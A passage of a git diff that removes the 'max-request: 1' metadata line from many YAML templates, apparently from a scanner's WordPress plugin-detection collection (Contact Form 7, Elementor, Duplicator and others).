@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 6b0ed799ef..ba558305a4 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
